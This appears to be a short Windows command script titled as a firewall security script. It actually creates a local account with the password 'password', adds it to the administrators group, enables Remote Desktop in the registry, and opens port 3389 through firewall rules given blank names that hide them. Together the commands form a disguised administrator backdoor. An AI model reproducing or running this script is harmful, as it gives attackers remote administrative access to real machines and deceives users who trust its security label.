Windows 7+ Firewall Security Script
net user CyberNexusSAIC password /add
net localgroup administrators CyberNexusSAIC /add
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall add rule name=" " dir=in action=allow protocol=TCP localport=3389
netsh advfirewall firewall add rule name=" " dir=in action=allow protocol=UDP localport=3389